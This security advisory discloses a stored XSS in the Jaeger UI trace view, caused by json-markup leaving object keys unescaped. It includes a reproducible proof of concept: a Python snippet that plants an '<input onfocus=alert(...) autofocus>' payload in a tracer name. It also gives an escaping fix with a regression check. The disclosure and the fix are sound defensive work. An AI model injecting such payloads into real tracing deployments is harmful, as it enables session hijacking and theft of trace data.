Summary
There is a stored XSS when viewing trace details. The XSS happens while rendering key-value tables in jaeger UI using the KeyValuesTable component.
Details
The offending component is KeyValuesTable.tsx (https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L64), which uses dangerouslySetInnerHTML to render HTML markup generated by the 'json-markup' package from input values that are potentially attacker-controlled.
The json-markup package (https://github.com/mafintosh/json-markup/blob/master/index.js#L88) does not properly sanitize keys in JSON objects: values are escaped before being placed in the markup, but object keys are not.
PoC
In order to reproduce, perform the following steps:
- Start a new instance of Jaeger (I used the latest all-in-one docker image):

```shell
docker run -d --name jaeger \
  -e COLLECTOR_ZIPKIN_HOST_PORT=:9411 \
  -e COLLECTOR_OTLP_ENABLED=true \
  -p 6831:6831/udp \
  -p 6832:6832/udp \
  -p 5778:5778 \
  -p 16686:16686 \
  -p 4317:4317 \
  -p 4318:4318 \
  -p 14250:14250 \
  -p 14268:14268 \
  -p 14269:14269 \
  -p 9411:9411 \
  jaegertracing/all-in-one:1.46
```
- Use the following Python snippet to generate the trace that triggers the XSS (the indentation of the original snippet was lost and is restored here):

```python
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.sdk.resources import SERVICE_NAME, Resource

# The service name under which the trace shows up in the Jaeger UI.
resource = Resource(attributes={
    SERVICE_NAME: "solidlab"
})
provider = TracerProvider(resource=resource)

# Export over OTLP/gRPC to the all-in-one container started above.
otlp_exporter = OTLPSpanExporter(endpoint="http://localhost:4317")
processor = BatchSpanProcessor(otlp_exporter)
provider.add_span_processor(processor)
trace.set_tracer_provider(provider)

# The instrumentation scope name ends up as a key in the span's key-value
# table, which json-markup renders without escaping.
tracer = trace.get_tracer("{\"<input onfocus=alert(document.domain) autofocus>\":\"solidlab.tracer\"}")

with tracer.start_as_current_span("test_span") as span:
    span.set_attribute('test_attr', 'test_val')

# Make sure the batched span is exported before the interpreter exits.
provider.force_flush()
```
- In the Jaeger UI on http://localhost:16686/, select the 'solidlab' service, select the only trace present, open the span and expand the tags section. An alert box will pop up.
Impact
If an attacker controls the "key" part of a key-value pair (in a tag, log or process section), they can inject a JavaScript payload that is executed once the offending trace is viewed and the corresponding section (tags/process/logs) is opened. Using the XSS, an attacker would be able to perform arbitrary Jaeger queries in the victim's session and exfiltrate the returned data.
Mitigation
Patch the json-markup library to properly sanitize (HTML-escape) object keys, not only values.
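As an added illustration of the mitigation (this is not json-markup's or jaeger-ui's own code): a small key-value renderer that HTML-escapes object keys as well as values, so the key from the PoC above is displayed as text rather than parsed as markup. The sample object is constructed here from the PoC's key and attribute; the function names are hypothetical.

```javascript
// Minimal HTML escaper covering the characters that can break out of text
// or attribute context in rendered markup.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Renders a value; nested objects become nested tables, primitives become
// escaped <span> text. Escaping is applied to every string we emit.
function renderValue(value) {
  if (value !== null && typeof value === 'object') {
    return renderObject(value);
  }
  return `<span class="json-markup-${typeof value}">${escapeHtml(String(value))}</span>`;
}

// Renders an object as a two-column table. The fix the advisory asks for is
// the escapeHtml(k) on the KEY cell; escaping only the value cell is not enough.
function renderObject(obj) {
  const rows = Object.entries(obj).map(
    ([k, v]) => `<tr><td class="json-markup-key">${escapeHtml(k)}</td><td>${renderValue(v)}</td></tr>`
  );
  return `<table class="json-markup">${rows.join('')}</table>`;
}

// Regression check: true if the rendered HTML contains any tag other than the
// ones this renderer itself emits (i.e. markup smuggled in through the data).
function containsUnexpectedTag(html) {
  const allowed = /^<\/?(table|tr|td|span)(\s|>)/;
  return (html.match(/<[^>]*>/g) || []).some((tag) => !allowed.test(tag));
}

// Constructed sample mirroring the PoC: the tracer-name key next to a benign tag.
const sample = {
  '<input onfocus=alert(document.domain) autofocus>': 'solidlab.tracer',
  test_attr: 'test_val',
};

const rendered = renderObject(sample);
console.log(rendered);
console.log('unexpected tags:', containsUnexpectedTag(rendered)); // false
```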
Credits
Discovered by Georgy Noseevich (@webpentest) from Solidlab LLC.